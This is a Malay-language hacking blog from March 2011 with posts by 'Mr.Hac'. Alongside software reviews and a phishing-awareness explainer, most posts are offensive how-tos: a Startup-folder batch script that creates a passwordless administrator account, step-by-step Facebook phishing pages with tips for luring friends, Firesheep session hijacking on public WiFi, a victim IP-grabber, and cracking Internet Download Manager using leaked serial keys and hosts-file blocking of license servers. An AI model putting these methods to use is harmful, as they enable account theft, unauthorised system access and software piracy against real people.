31 March 2011

UM Player vs K-Lite Codec Pack


Salam..yeah! Hac kembali lagi dengan entry yang lebih hangat daripada selalu..heheheh.. (dah ala-ala hot.fm pulak!)

Ok..berbalik kepada tajuk entry Hac, Hac nak kongsi dengan anda semua satu media player yang gempak..UM Player : Universal Multimedia Player..



UM Player ni memang gempak..ia mempunyai begitu banyak sekali codec terbina dalaman yang setanding dengan K-Lite Codec Pack..ia dapat memainkan pelbagai jenis video dan audio..disamping fungsi sampingannya yang jauh lebih baik daripada K-lite Codec Pack..

Untuk melihat fungsi-fungsi dan apa yang ditampilkan oleh UM Player ini, sila ke sini ---> UM Player Features

Ia menyokong pemasangan pada Windows, Linux, dan juga Ubuntu..untuk versi Mac akan dirilis tidak lama lagi..saiznya setelah dipasang hanya 70.64MB sahaja..ia adalah perisian percuma dan anda boleh membuat modifikasi terhadap kodnya (open source project)..anda boleh mencari video yang ada di Youtube dan Shoutcast serta boleh merekodkannya..disamping itu, anda boleh membuat screenshot pada video yang sedang dimainkan ketika itu..

Ia jauh lebih 'ringan' dari K-Lite Codec Pack yang telah dipasangkan pada peranti Windows 7 dengan processor Atom (Netbook aje)..pemain ini boleh dikatakan lebih pantas dan lebih banyak kegunaannya..

Jangan tunggu lebih lama..cuba UM Player sekarang dan berikan ulasan anda di bawah!

untuk memuat turun perisian ini, sila klik di sini ---> UM Player



29 March 2011

Apa Yang Mr.Hac Fikirkan Ketika Tidur?


Salam..aneh dengan tajuk di atas? ya..kali ni memang Hac nak lari sikit dari tajuk yang biasanya mengenai komputer..dah letih dah nak menulis panjang-panjang ni..
entry Web Browser Terbaik, Terhebat, Terpantas! telah mendapat komen yang paling banyak setakat ini, dan ini telah membuatkan Hac berasa sangat-sangat puas hati dengan respons yang diterima oleh
para The Hykerz dan juga blogger-blogger yang lain..
mungkin Hac akan buat ulasan mengenai Lunascape, mungkin juga tidak..bergantung kepada masa, dan juga respons yang bakal diterima kemudian..yang pasti entry ini akan dijadikan sebagai 'Featured Entry' menggantikan entry Hack Akaun Administrator Daripada Akaun Guest..

Berbalik kepada tajuk entry kali ini, Hac hanya nak post satu gambar yang Hac dapat masa Hac googling..



Eheheh..Entry ini adalah entry santai sahaja..harap korang semua suka..entry akan datang barulah Hac akan menulis tentang perkara yang lebih serius..semoga kita berjumpa lagi pada entry akan datang..
salam hormat dari Hac..





28 March 2011

Apakah Yang Dimaksudkan Sebagai Malware?


Apa itu malware? definisi malware? entri ini akan mengupas lebih lanjut berkenaan dengan terma yang selalu digunakan pada masa kini..

Malware

Malware telah menjadi masalah semua orang yang menggunakan komputer bagi sepanjang zaman..Malware adalah kata singkatan dari Malicious Software (perisian yang berbahaya).
Sebuah Malware pada dasarnya adalah sebuah program yang direka khas untuk menjangkiti sebuah sistem komputer tanpa pemiliknya diberitahu terlebih dahulu.




Jenis Malware

Malware ada dalam berbagai bentuk. Jenis disebutkan di bawah ini adalah beberapa jenis malware yang paling umum.

1. Trojan Horse - Virus Trojan atau Trojan Horse adalah salah satu jenis yang paling umum dari malware. Trojan banyak digunakan untuk mengendalikan komputer mangsa, berbanding dengan menjangkiti atau merosakkan fail-fail di komputernya. Sebuah Trojan horse, sekali dipasang ke dalam komputer mangsa akan dapat memberikan penggodam akses penuh ke komputer anda. Trojan adalah salah satu bentuk yang paling berbahaya dari malware.

2. Virus Komputer - Virus komputer adalah program berbahaya yang sebahagian besarnya dikembangkan untuk menjangkiti komputer, setelah menginfeksi komputer itu ia akan membuat ulangan atau menyalinkan dirinya sendiri. Virus adalah seperti parasit dan memerlukan perumah (host) lain untuk melampirkan dirinya bagi menjangkiti komputer.

3. Worms - Worms atau cecacing adalah hampir serupa dengan virus komputer cuma satu-satunya perbezaan jika hendak dibandingkan dengan virus komputer ialah ia tidak memerlukan perumah lain untuk melampirkan dirinya bagi menjangkiti komputer. Sekali worm menginfeksi komputer itu ia akan melakukan ulangan dan menyalin dirinya itu sendiri. Cecacing komputer adalah ancaman utama untuk rangkaian besar.

4. Keylogger - Sebuah Keylogger merupakan sebuah peranti keras atau perisian yang memantau setiap keystroke (keyboard stroke), screen shot, chatting dan lain-lain yang ditaip di komputer. Sebuah program keylogger tidak memerlukan akses fizikal ke komputer pengguna. Setiap orang dengan pengetahuan dasar/asas tentang komputer boleh menggunakan keylogger.

5. RAT - RAT adalah kependekan daripada "Remote Administration Tool" dan memang salah satu jenis yang paling berbahaya dari malware. Ia sangat serupa dengan Trojan. Setelah RAT dipasang pada komputer, penyerang dapat melakukan hampir apapun pada komputer remote seperti memasang keylogger, mematikan komputer, menginfeksi file dan lain-lain.

6. Adware - Adware adalah kata singkatan dari Advertisement-supported software (perisian sokongan iklan). Adware umumnya direka untuk memaparkan iklan pada komputer anda. Namun beberapa adware ini mungkin mengandungi virus berbahaya dan program pengintip (Spy software @ spyware) yang boleh membawa sistem komputer anda kepada kemusnahan.

Jadi ini adalah dari jenis yang paling umum untuk malware. Diharap anda semua akan mengambil inisiatif untuk berjaga-jaga terhadap serangan malware dengan menggunakan Antivirus yang paling terbaru. MY HACKERS ARE HERE merekomenkan ESET SMART SECURITY 4 atau ESET ANTIVIRUS 4 untuk perlindungan yang maksimum.


Sila ke sini---> Eset Smart Security 4.2.71.2 Including Username and Password Finder




25 March 2011

Web Browser Terbaik, Terhebat, Terpantas!


Salam..hari ni Hac nak cerita tentang satu lagi web browser yang mendapat perhatian khusus dari Hac..

Selepas Mozilla Firefox 4 dilancarkan kelmarin, dan Internet Explorer 9 juga telah dilancarkan, nampaknya Google Chrome perlu mengatasi masalah shockwave playernya yang kerap mengalami crash akibat tidak dapat menanggung 'beban' dari laman web yang memakai kod baru atau kod yang terlalu 'berat'..

Kemudian, Hac cuba mencari alternatif kepada ketiga-tiga web browser utama ini..hasilnya, Hac berjaya menemukan sebuah web browser yang telah dibuat dari Jepun, iaitu LUNASCAPE (Version 6.4.5).




Apa kelebihan web browser ini?? ya..Hac pasti anda semua akan terkejut kerana sebelum ini, Hac pernah mengutarakan sebuah web browser yang begitu pantas iaitu Maxthon 3.0..
ianya adalah sebuah web browser yang memakai enjin dari Internet Explorer.

Akan tetapi, Lunascape adalah web browser yang memakai KETIGA-TIGA enjin dari web browser utama tadi iaitu Internet Explorer, Google Chrome, dan Mozilla Firefox..


Lunascape = IE (Trident)+Firefox (Gecko)+Chrome・Safari (Webkit)


ini bermakna, ia juga menyokong ketiga-tiga add on dari web browser yang telah dipasang pada PC anda! pendek kata ia adalah web browser Universal Add-On!
Kalau anda rasakan Mozilla Firefox begitu User Friendly, Google Chrome Begitu pantas sekali, dan Internet Explorer memudahkan kerja-kerja pejabat anda,
maka Lunascape lebih lagi!
Add-On dari Mozilla Firefox dapat dipakai dengan cemerlang tanpa masalah..
selain itu, apabila anda menemukan sebuah laman yang tidak dapat dibuka dengan baik oleh Lunascape, anda hanya perlu menukar enjinnya sahaja!

Lunascape telah diuji untuk membuka 100 tab pada satu masa (serentak) dan terbukti ia tidak mengalami masalah sedikit pun..ia juga menyokong pemasangan pada Windows 7..dengan tiga enjin dari web browser ternama lagi tersohor itu, maka anda tidak perlu lagi menukar-nukar web browser untuk capaian laman yang lebih baik..hanya tukarkan enjin, dan anda sudah pun diibaratkan sedang memakai 'web browser' tersebut..contohnya apabila anda memakai enjin Trident, anda ibarat sedang membuka Internet Explorer..apabila anda tukar (switch) kepada Gecko, anda sudahpun menukar ia kepada Mozilla Firefox..begitu juga apabila anda menukar ia kepada Webkit, ibarat anda sedang melayari internet dengan menggunakan Google Chrome..ya..begitulah perumpamaan untuk kebolehan Lunascape..

Lunascape juga mempunyai kebolehan dari Google Chrome iaitu 'Inspect' yang sekiranya anda periksa pada Google Chrome, ianya adalah 'Inspect Element'..aplikasi yang sama, nama sahaja berbeza..ia digunakan untuk melihat kod yang digunakan pada sesebuah blog atau laman web..

Ia juga menyokong pemasangan secara mudah alih (portable) iaitu ia boleh dipasangkan pada pendrive anda..wah..ini sudah cukup bagus..

Lunascape bukan sekadar memakai 3 ENJIN UTAMA sahaja, tetapi yang pasti ia LEBIH PANTAS BERBANDING WEB BROWSER YANG ASAL..

jadi kenapa perlu memasang tiga web browser sedangkan anda hanya perlu memasang SATU sahaja pada PC anda? saiznya setelah dipasang juga tidak begitu besar berbanding Google Chrome iaitu cuma 122MB sahaja (Google Chrome 146MB)..

Untuk mencuba perisian web browser ini, anda boleh pergi memuat turunnya disini ---> Lunascape

Untuk melanggan siri video tutorial penggunaan Lunascape,
sila ke sini ---> Lunascape Inc Official Channel

Hac telah mencuba untuk membuka laman Youtube dengan keadaan internet di pejabat yang terlalu lambat dan hasilnya sangat memuaskan..buffering yang diperlukan oleh Lunascape lebih pantas dari Maxthon 3.0..

Jadi apa tunggu lagi? cuba sekarang dan sila komen dibawah ya!

23 March 2011

Silent Hackers : Ke Mana Menghilang?


Salam..
Disini Mr.Hac nak buat satu pengumuman..




Kepada semua forumer-forumer tegar SILENT HACKERS, kalian semua usah khuatir, usah risau, usah bimbang..Silent Hackers tidak menghilang, tidak digodam, tidak lupus atau pupus..pihak pengurusan atasan forum sedang berusaha menaik taraf server Silent Hackers..selepas ini Silent Hackers akan kembali, membuat 'come back' yang lebih gempar kerana forum akan lebih teguh berdiri diatas servernya sendiri..

Projek-projek 'mega' yang bakal dibuat yang disebut sendiri oleh sumber yang boleh dipercayai ialah Silent Hackers akan punya game online sendiri (kalau tak silap, dah lupa maklumat sebenarnya), dan juga beberapa projek lain yang lebih gempar selain Teh Tarik Session (TTS @ perjumpaan sesama ahli forum), membuat baju forum Silent Hackers yang semestinya terbaik dan lain-lain lagi..

Jadi..kepada semua forumer Silent Hackers, sabarlah menanti kerana
"Silent Hackers will come back with even more projects and knowledges for all of us!"



Facebook Pro Hacker v.2011


Salam..hari ni Mr.Hac mood baik jadi Hac nak bagi korang semua sebuah perisian bersaiz kecil yang dikatakan mampu mendapatkan kata laluan akaun Facebook rakan anda..

Terdapat beberapa pro dan kontra yang menjadi persoalan kajian pada perisian kali ini..adakah ia benar-benar berkesan atau hanya omongan kosong dari laman pembangunnya hanya untuk mendapatkan trafik yang berduyun-duyun masuk ke lamannya hanya semata-mata untuk mendapatkan perisian picisan yang ternyata tidak berkesan?

Ya..mari kita sama-sama mengkaji dua video dibawah yang menunjukkan kedua-dua pro dan kontra perisian kecil yang dinamakan sebagai Facebook Pro Hacker v.2011 ini!








Video Pro:




Video Kontra yang mengatakan ia adalah perisian palsu:




Nak cuba?
nah..muat turun pada pautan dibawah:

Klik disini---> Facebook Pro Hacker v.2011




21 March 2011

Cipta Akaun Administrator Jika Anda Hanya Mempunyai Akaun Guest Pada Windows XP


Salam..ini adalah tutorial pendek kerana Hac tak punya banyak masa..




@echo off
net user Admin /add /expires:never /passwordreq:no
net localgroup “Administrators” /add Admin

copykan kod diatas dan save sebagai fail bat.

copy fail tadi ke dalam folder startup.


C:\Documents and Settings\All Users\Start Menu\Programs\Startup


Apabila admin login ke akaunnya selepas itu, fail batch tadi akan dijalankan secara automatik dan satu akaun administrator akan tercipta..

Jadi pada masa akan datang anda boleh login:

username: admin
password: no

harap anda semua suka post pendek pada kali ini..


18 March 2011

Perisian Super Phisher Untuk Membuat Laman Phishing Dengan Mudah


Salam..Perisian Super Phisher ialah sebuah perisian bersaiz kecil yang dapat dimanfaatkan untuk membuat sebuah laman phishing dengan mudah tanpa perlu menjadi seorang pakar skrip..





Langkah-langkah Penggunaan:

1. Muat Turun Disini ---> Super Phisher by MyHac

2. Klik pada perisian Super Phisher. Masukkan URL of Login Page ---> URL laman yang ingin kita godam contohnya : http://www.facebook.com

3. Name of Log File ---> Tempat di mana kata laluan mangsa akan disimpan. namakan ia contohnya sebagai : password.txt

4. Name of PHP File ---> Tempat mangsa akan login. namakan ia sebagai contoh : login.php

5. Site to redirect to ---> laman mangsa akan dihalakan selepas login di fake login page. contohnya : http://www.google.com atau http://www.facebook.com

6. Klik pada 'Build Phisher'..

7. Selesai.

Untuk mengetahui cara menggunakannya, pergi ke sini ---> Hack Facebook Menggunakan Fake Login Page


17 March 2011

Troubleshooter : Fake Login Page


Salam..sebelum ni Hac ada ajarkan cara untuk hack Facebook dengan menggunakan Fake Login Page dan juga Firesheep..namun ada beberapa masalah untuk kaedah Fake Login Page iaitu kata laluan tidak muncul dalam akaun..

Troubleshooter 1

Sila ikuti langkah-langkah dibawah untuk menyelesaikan masalah anda:

1. Buka Fake.html dengan menggunakan Notepad.

2. Kemudian, tekal Ctrl+F dan cari terma 'action='. tukarkan nilainya (value) kepada pass.php. contoh : action=pass.php


3. Savekan fail tersebut. setelah itu, upload kembali dalam web hosting yang telah anda daftarkan dan mulakan kembali operasi hacking anda..

4. Selesai.


Troubleshooter 2

Sesetengah orang merungut akaun mereka digantung setelah melakukan perkara di atas..
sebagai alternatif, sila gunakan ---> 000webhost


Sebelum melakukan apa-apa, cuba terlebih dahulu phisher @ fake login page itu. masukkan id dan kata laluan yang direka oleh anda dan lihat sama ada kata laluan sudah berhasil masuk ke akaun anda.


Troubleshooter 3

1. Muat turun ---> Facebook Fake Login Page (By My Hackers Are Here)

2. Ekstrak kedua-dua fail. buka fail no 2 iaitu 'Pass.php' dan cari http://www.myhackersarehere.com

3. Gantikan kepada http://www.facebook.com

4. Buka akaun di ---> t35.com

5. Buka fail 'Facebook' dengan notepad dan cari terma 'action='. Pilih yang pertama. (tekan Ctrl+F untuk mencari)

6. Anda akan jumpa "/login.php" dan tukarkannya kepada "/(username anda di t35.com)/pass.php.php"

7. Savekan kedua-dua fail tadi.

8. Login ke akaun t35.com anda dan cari button 'upload'. muat naik kedua-dua fail tadi.

9. Ulang proses penggodaman dengan mencuba fail tersebut terlebih dahulu.

10. Hantarkan pautan (link) itu kepada rakan anda setelah mencubanya.

11. Untuk melihat kata laluan yang telah di masukkan, pergi kepada akaun t35.com anda, dan anda akan dapat lihat terdapat satu fail baru diantara Facebook dan Pass.php

12. Klik padanya untuk melihat segala data yang telah dimasukkan.

16 March 2011

Hack Facebook Dengan Menggunakan Firesheep


Salam..pada entry yang lalu, Hac ada memberi tahu kaedah mudah menggodam Facebook dengan menggunakan Fake Login Page atau Phishing..pada entry kali ini, Hac nak ajarkan satu lagi teknik mudah menggunakan add-on untuk web browser Mozilla Firefox iaitu Firesheep.

Firesheep menggunakan kaedah Rampasan Sesi (Session Hijacking) untuk mendapatkan akses ke akaun Facebook khususnya dan akaun-akaun lain seperti gmail, yahoomail amnya..Firesheep telah dimuat turun sebanyak 104,000 kali dalam tempoh 24 jam seperti yang dilaporkan oleh Techcurnch.


Apakah Yang Dimaksudkan Dengan Session Hijacking?

Dalam sesi serangan rampasan http (http session hijacking attack), seseorang penyerang mencuri cookies mangsa yang tersimpan didalam komputer. Cookies menyimpan maklumat yang lengkap tentang akaun seseorang, dan dengan menggunakan maklumat ini, penggodam @ penyerang akan dapat menggodam akaun sesiapa sahaja dan menukar kata laluan akaun tersebut. kesemua akaun yang bersangkutan akan dapat dimanipulasikan oleh penggodam.


Kaedah Penggunaan Firesheep:

Apa yang diperlukan ialah:

1. Akses WiFi Umum (Public WiFi Access)

2. WinPcap

3. Firesheep


Langkah-Langkah Penggunaan:


1. Muat turun Firesheep dari pautan diatas dan gunakan pilihan 'open with' untuk membukanya dengan menggunakan Mozilla Firefox. boleh juga menggunakan kaedah seret dan lepas (drag and drop) kepada web browser Mozilla Firefox anda.



2. Setelah memasang Firesheep pada web browser Mozilla Firefox, pergi pada View > Sidebar > Firesheep
Jangan lupa untuk memasang WinPcap. ia perlu digunakan bersama dengan Firesheep.



3. Klik pada 'Start Capturing' dan Firesheep akan mula 'menangkap' sesi cookies oleh sesiapa yang berada dalam lingkungan rangkaian WiFi. ia akan menunjukkan kepada anda cookies milik sesiapa sahaja yang berjaya 'ditangkap' oleh Firesheep disebabkan mereka melayari laman-laman web secara tidak selamat. Anda hanyap perlu klik sahaja pada gambarnya dan anda akan terus login ke akaun mangsa.



15 March 2011

Cara Mendapatkan IP


Ini adalah kaedah asas untuk golongan pemula memahami cara ringkas bagi mendapatkan IP orang lain. Internet Protocols (IP), merupakan elemen penting kepada penggodam kerana ia merupakan 'alamat' sesebuah PC dalam sesuatu rangkaian. ia juga boleh digunakan untuk mendapatkan lokasi asas seseorang itu tinggal.

Dengan menggunakan method di bawah, seseorang dapat menggodam IP orang lain dengan mudah. kaedah ini lebih mudah kerana menggunakan kaedah skrip (script).




Kaedah Mendapatkan IP:


1. Pertama sekali, muat turun IP Hack ---> IP Hack

Kata Laluan: @hackaholic

2. Muat naik fail tadi ke mana-mana web hosting percuma seperti 110MB.com

3.

Tukarkan permissions iphack kepada 777

4. Hantarkan kepada mangsa dan minta beliau untuk mengklik pautan (link) tersebut.

5. Untuk mengelakkan dari dicurigai oleh mangsa, maka kod fail tadi telah mengarahkan mangsa ke google.com (redirected)

6. Sekarang buka IP.txt untuk mengetahui IP mangsa.

7. Selesai.


Ini adalah kaedah ringkas, dan asas kepada penggodaman IP. diharap tunjuk ajar ini dapat diaplikasikan untuk tujuan yang betul.




14 March 2011

Hack Facebook Menggunakan Fake Login Page


Salam..dalam entry sebelum ini Hac ada bincangkan mengenai Phising..kali ni Hac akan ajarkan bagaimana kaedah untuk membuat Fake Login Page (phisher) untuk menggodam facebook. ini adalah kaedah manual yang mudah dipelajari dan sesuai untuk mereka yang baru memulakan minat dalam penggodaman. disebabkan ramai yang meminta artikel Facebook Hacking, maka artikel ini dikeluarkan pada hari ini untuk para pembaca yang telah mengikuti blog My Hackers Are Here. sememangnya ada cara yang lebih mudah iaitu menggunakan perisian, tetapi untuk mereka yang baru, cara manual adalah cara yang terbaik untuk belajar.



Hack Facebook Menggunakan Fake Login Page:

1. Pertamanya, kita akan memerlukan Fake Login Page (fake.html), dan login.php. anda boleh muat turun kedua-duanya di sini ---> Facebook Hacking Packages

Password: @hackaholic

2. Setelah mengekstrak fail rar tadi, buka login.php dengan note pad, tekan ctrl+f dan cari www.enteryoursite.com. gantikannya dengan alamat URL yang anda mahu mangsa dihalakan kepadanya (redirected) dan savekan fail itu.

Nota: Ini adalah langkah yang sangat penting. untuk memastikan mangsa tidak mencurigai login page, maka halakan mangsa kepada www.facebook.com




3. Sekarang buat satu akaun di dalam web hosting yang percuma seperti 110mb.com, T35.com, ripway.com, atau 000webhost.

4. Setelah itu muat naik kedua-dua fail iaitu fake.html dan login.php ke direktori anda. kemudian, hantarkan pautan (link) fake.html kepada mangsa anda.

Contoh: www.yoursite.110 mb.com/fake.html



5. Apabila mangsa klik pada pautan tersebut dan memasukkan informasi akaunnya ke dalam Fake Login Page dan klik pada login, dia akan dihalakan kepada laman yang telah ditetapkan dalam langkah nombor 2.


6. Untuk melihat informasi akaun mangsa, login ke dalam akaun web hosting percuma yang telah anda daftarkan sebentar tadi dan anda akan dapat lihat satu fail baru iaitu 'password.txt'. buka fail itu dan anda akan dapat lihat id serta kata laluan akaun mangsa.

7. Selesai.







Apa itu Phishing?


Salam..jom kita sama-sama belajar apa itu phishing dan tujuannya..


Phishing merupakan percubaan untuk melakukan jenayah penipuan dengan mendapatkan maklumat sensitif, seperti username, password dan butiran kad kredit, dengan muncul sebagai entiti yang dipercayai dalam sebuah komunikasi elektronik. Bank online, eBay, PayPal dan lain-lain adalah target umum seorang penggodam. Phishing biasanya dilakukan melalui e-mel atau mesej segera dan sering mengarahkan pengguna untuk memasukkan butiran di sebuah website. Phishing adalah contoh dari teknik kejuruteraan sosial yang digunakan untuk menipu pengguna. Percubaan untuk menangani peningkatan jumlah insiden phishing termasuklah melalui perundangan, latihan kepada pengguna, kesedaran masyarakat, dan langkah-langkah teknikal.





Percubaan phishing yang terbaru telah menyasarkan pelanggan bank dan perkhidmatan pembayaran dalam talian. laman jejaring sosial seperti Orkut juga merupakan target phishing.

E-mel palsu adalah alat yang paling banyak digunakan untuk melakukan serangan phishing. Dalam banyak kes kita mendapat e-mel palsu yang tampaknya telah datang dari laman yang dipercayai. di sini seorang penggodam boleh meminta pengguna untuk mengesahkan username dan password dengan membalas ke alamat e-mel yang diberikan.




TEKNIK SERANGAN PHISHING


1. Pautan Manipulasi

Sebahagian besar kaedah phishing menggunakan beberapa bentuk penipuan teknikal yang direka untuk membuat link dalam e-mel yang kelihatan seperti milik beberapa pertubuhan yang dipercayai atau organisasi palsu. URL yang salah ejaannya atau penggunaan subdomain adalah trik umum digunakan oleh phisher, seperti contoh URL dibawah:

www.micosoft.com

www.mircosoft.com

www.verify-microsoft.com

dan bukannya www.microsoft.com


2. Filter Evasion

Phisher telah menggunakan gambar (bukan teks) yang membuatkan ia lebih sukar untuk anti-phishing mengesan teks yang umum digunakan dalam e-mel phishing. Ini adalah alasan Gmail atau Yahoo akan mematikan gambar secara default untuk emel yang masuk.


Bagaimanakah rupa serangan phishing/scam?

Apabila kaedah penipuan menjadi lebih canggih, begitu jugalah mesej e-mel dan tetingkap pop up yang telah dicipta. Mereka sering memasukkan logo rasmi dari organisasi nyata dan maklumat pengenalan lain yang diambil secara terus dari laman web yang sah. Ini adalah contoh bagaimana e-mel phishing kelihatan:





Contoh mesej phishing, termasuk alamat URL palsu yang dihubungkan ke sebuah laman web scam/penipuan.

Untuk membuat e-mel phising tampak lebih asli, para phisher/scammer akan meletakkan:

1. Sebuah link dalamnya yang dihubungkan ke laman web yang sah,
2. Tetapi sebenarnya membawa anda ke sebuah laman web phising
3. Atau mungkin pop-up yang tampak persis seperti laman rasmi.

Laman-laman tiruan juga disebut 'spoofed website'. Setelah anda berada di salah satu laman web palsu tersebut, anda akan menghantar maklumat peribadi kepada para penggodam.


Bagaimana mengenalpasti e-mel palsu?

Berikut adalah beberapa frasa untuk mengesannya, jika anda merasakan mesej e-mel tersebut adalah phishing scam.

"Pengesahan akaun anda."

laman web yang sah tidak akan pernah meminta anda untuk menghantar kata laluan, nama, nombor Jaminan Sosial (Social Security number), atau maklumat peribadi yang lain melalui e-mel.

"Jika anda tidak merespon dalam masa 48 jam, akaun anda akan ditutup."

Mesej ini menyampaikan keadaan terdesak sehingga anda akan memberi respons dengan cepat tanpa berfikir.

"Pelanggan Yang Terhormat."

Emel Phishing biasanya dihantar dalam keadaan tidak mengandungi nama pertama atau terakhir.

"Klik link di bawah untuk mendapatkan akses kepada akaun anda."

mesej berformat HTML boleh mengandungi pautan atau bentuk yang anda boleh mengisi seperti mengisi borang di laman web. pautan yang anda didesak untuk klik mungkin mengandungi semua atau sebahagian daripada nama sebuah syarikat nyata/asli dan biasanya "ditopengkan," bererti bahawa link yang anda lihat tidak membawa anda ke alamat itu tapi di suatu tempat yang berbeza, biasanya laman web scam/palsu.


Jadi perkara penting untuk mempertahankan diri dari serangan phishing adalah:

1. Jangan beranggapan bahawa e-mel dapat disahkan berdasarkan pada alamat e-mel penghantar.

2. Sebuah bank yang dipercayai / organisasi seperti paypal tidak akan pernah meminta anda untuk memberi nama penuh dan password anda di dalam emel paypal.

3. Sebuah email dari organisasi dipercayai tidak akan mengandungi lampiran atau perisian.

4. Mengklik link dalam e-mel adalah cara yang paling tidak selamat untuk masuk ke akaun anda.



11 March 2011

Cara Menggunakan Perisian Versi Trial Untuk Selama-lamanya


Salam semua..entry ni Hac tulis setelah beberapa hari ni Hac sibuk dengan kursus..bila dah jumpa bahan untuk ditulis, Hac cepat-cepat capai netbook..hari ni Hac nak bagi tahu cara untuk menggunakan perisian versi trial untuk selama-lamanya! ya..memang seronok kerana kita tidak lagi perlu bersusah-payah mencari keygen ataupun patch..


KONSEP

Apabila kita memasang (install) sesuatu perisian, ia akan membuat entry di Windows Registry dengan perincian pemasangan seperti tarikh dan masa pemasangan, direktori dan lain-lain. setiap kali kita menjalankan perisian itu, ia akan membandingkan antara tarikh dan waktu sistem dengan tarikh dan waktu pemasangan. jadi dengan ini ia akan dapat mengesan sama ada perisian tersebut sudah tamat tempoh percubaannya atau tidak. jadi, sekiranya kita dapat membuatkan perisian itu 'berfikir' bahawa tempoh percubaannya tidak tamat lagi, oleh itu kita akan dapat menggunakan ia untuk selama-lamanya.






Bagaimana Kaedahnya Menggunakan Perisian Versi Trial Untuk Selama-lamanya:

Pertamanya muat turun terlebih dahulu perisian Crack Lock di sini dan ikuti langkah-langkah yang diberikan di bawah.


1. Sentiasa tuliskan tarikh dan masa pemasangan perisian versi trial untuk pertama kalinya.

2. Apabila tarikh percubaanya sudah tamat, jangan sekali-kali buka perisian itu.

3. Sekarang buka Crack Lock yang telah dipasang pada PC korang dan pilih 'add program'.

4. Kemudian, pergi dan cari perisian versi trial yang ingin korang gunakan untuk selama-lamanya di direktori ia dipasangkan dan 'suntik' tarikh terakhir ia luput.


CONTOH: Jika tarikh tamat tempoh percubaan perisian itu ialah 30 Disember, sentiasa masukkan tarikh 29 Disember.


5. Ulang langkah diatas untuk semua perisian trial yang ingin digunakan untuk selama-lamanya.


Nota: Apabila tarikh tempoh percubaan telah tamat, jangan buka ia terus begitu sahaja. sentiasa buka dengan perisian Crack Lock terlebih dahulu.




07 March 2011

E-Book Hacking Percuma Dari Mr.Hac (Siri 3)


Salam semua The Hykerz dan para pembaca yang dikasihi..



Seperti yang dijanjikan dalam tajuk di atas, haaa..korang boleh muat turun secara percuma ye..
penerangan akan dibuat kemudian..

Klik Di Sini ---> Google Hacking

atau boleh juga di sini -> Google Hacking

06 March 2011

Kaedah Untuk Hack dan Crack Internet Download Manager Secara Manual


Salam semua..entry ni adalah entry yang ke 5 pada hari ini..Mr.Hac terpaksa post dengan banyak sebab minggu depan agak sibuk untuk Mr.Hac. Oleh itu, entry ni Mr.Hac dedikasikan untuk semua followers dan para pembaca sekalian..

Masalah yang sering kita hadapi apabila menggunakan Internet Download Manager (IDM) yang crack ialah server check yang kerapkali mengganggu..biarpun kita sudah menggunakan PATCH dan CRACK yang paling baru untuk 'membunuh' server check ini, namun kadangkala ia tidak memberikan kesan..IDM sudah melakukan banyak pembaharuan dan penambahbaikan untuk ciri-ciri keselamatan perisiannya..



Kaedah Hack/Crack IDM Secara Manual:

1. Muat turun perisian IDM versi trial di laman pembangunnya iaitu ---> Internet Download Manager
(Nak update pun boleh)

2. Klik pada Registration dan masukkan semua maklumat yang diperlukan. pada tetingkap registration, ia akan meminta maklumat seperti --> Name, Last Name, Email Address & Serial Key


3. Setelah mengisi maklumat seperti nama, e-mel, selepas itu masukkan serial key. Sila masukkan serial key di bawah (salah satu).

NRPXD-PIIYA-2YSOE-93SOA
2R7SC-NR3D7-SQWRQ-790BC
B2NN9-WZMY7-7WCSV-XMNIQ
ZVZO2-Z7MOR-YSYQX-ASDX9
ZQ3PR-AXVEE-CSE3E-CZYDA
DN7Y2-QY2WI-XSBE3-VYV03
22V3Q-0A9EY-3UA7O-OAO0Y
RLDGN-OV9WU-5W589-6VZH1
HUDWE-UO689-6D27B-YM28M
UK3DV-E0MNW-MLQYX-GENA1
398ND-QNAGY-CMMZU-ZPI39
GZLJY-X50S3-0S20D-NFRF9
W3J5U-8U66N-D0B9M-54SLM
EC0Q6-QN7UH-5S3JB-YZMEK
UVQW0-X54FE-QW35Q-SNZF5
FJJTJ-J0FLF-QCVBK-A287M

klik Ok untuk melengkapkan Registration.


4. Selepas kesemua langkah ini, akan muncul tetingkap lain yang menyatakan IDM telah didaftarkan dengan serial key yang palsu dan ia akan 'exit' dengan sendiri..ini diakibatkan oleh SERVER CHECK yang telah dapat mengesan dalam IDM terdapat serial key yang tidak ada di dalam data base pelanggan-pelanggan IDM.

5. Di sinilah kita memulakan langkah untuk mematikan server check IDM..

Pergi kepada Start > Run... > taipkan

notepad %windir%\system32\drivers\etc\hosts

Nota: Untuk pengguna Windows 7, korang tidak akan dapat 'save' hosts file..melainkan korang sudah disable sistem 'Run As Administrator'..

Oleh itu, pergi ke drive C:/ > Windows > System32 > Drivers > Etc > dalam folder ini korang akan jumpa host file tersebut.


6. Klik kanan pada fail hosts, dan klik pada Properties. Pergi kepada tab Security dan pergi kepada akaun admin. korang akan nampak 'button' edit. klik pada button edit dan tandakan 'Allow' pada semua kotak bahagian 'Allow' untuk memberikan 'Full Access' sistem kepada korang.


7. Klik pada fail hosts. buka dengan menggunakan notepad. satu fail akan keluar seperti gambar di bawah:



Kemudian, salin dan tampal (copy and paste) code di bawah pada fail hosts tadi (seperti dalam gambar di atas)


127.0.0.1 tonec.com
127.0.0.1 www.tonec.com
127.0.0.1 registeridm.com
127.0.0.1 www.registeridm.com
127.0.0.1 secure.registeridm.com
127.0.0.1 internetdownloadmanager.com
127.0.0.1 www.internetdownloadmanager.com
127.0.0.1 secure.internetdownloadmanager.com
127.0.0.1 mirror.internetdownloadmanager.com
127.0.0.1 mirror2.internetdownloadmanager.com


Selepas menambahkan code di atas, save fail notepad tadi.

Setelah itu, buka kembali IDM korang yang dah 'exit' selepas merajuk bila dimasukkan serial number yang palsu..ajaibnya (ajaib ke Mr.Hac?), IDM korang tak merajuk lagi dah! hehehe..

yang paling menarik, kalau korang nak upgrade lain kali, hanya perlu muat turun perisian IDM versi trial dari laman pembangunnya, dan apabila korang install IDM, ia merajuk kembali dan minta dimasukkan serial number, korang hanya perlu masukkan sahaja salah satu daripada serial number di atas tadi dan, wal-lah! IDM akan Full Version..ia akan sentiasa Full Version untuk setiap kali korang upgrade..



Ni bukti IDM Mr.Hac yang dah Full Version dengan kaedah ni:





Nota: nak update, memang dah tak boleh langsung..korang nak bukak laman web IDM pun tak boleh sebab dah di-disablekan oleh code tadi..sebagai jalan penyelesaian untuk update IDM, korang buka laman pembangun IDM, nanti korang akan diminta untuk masuk melalui cached copy. masuk melalui situ ok? dah masuk, apa lagi..sedut la!

Suka tak? kalau suka, kasik komen aaaaaa...




04 March 2011

Hack Remote Computer Dengan Menggunakan Ardamax Keylogger


